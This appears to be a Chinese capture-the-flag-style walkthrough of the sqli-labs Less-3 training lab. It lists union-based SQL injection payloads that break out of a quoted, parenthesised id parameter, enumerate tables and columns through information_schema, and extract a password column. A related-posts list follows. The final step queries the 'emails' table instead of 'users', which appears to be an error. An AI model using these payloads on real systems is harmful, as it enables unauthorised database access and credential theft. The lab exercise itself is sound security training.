Sqli-labs 3

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
?ccc?39 分钟前
MySQL故障排查与生产环境优化
数据库·mysql
零叹1 小时前
篇章二 论坛系统——系统设计
数据库·数据库设计·技术选型·表的设计
重生之后端学习1 小时前
苍穹外卖-day03
java·开发语言·数据库·spring boot·mysql·spring·tomcat
快起来别睡了1 小时前
传统数据表创建与Prompt方式的对比:以NBA赛季投篮数据表设计为例
数据库·程序员
远方16091 小时前
21-Oracle 23 ai-Automatic SQL Plan Management(SPM)
数据库·sql·oracle
语风方伯1 小时前
Mysql docker部署8.0升级到8.4
数据库
清风~徐~来2 小时前
【Qt】控件 QWidget
前端·数据库·qt
庸子2 小时前
MySQL从入门到DBA深度学习指南
数据库·mysql·dba
cookqq2 小时前
mongodb源码分析session执行handleRequest命令find过程
数据库·sql·mongodb·nosql
Bro_cat2 小时前
MongoDB 入门指南:安装、配置与 Navicat 连接教程
数据库·mongodb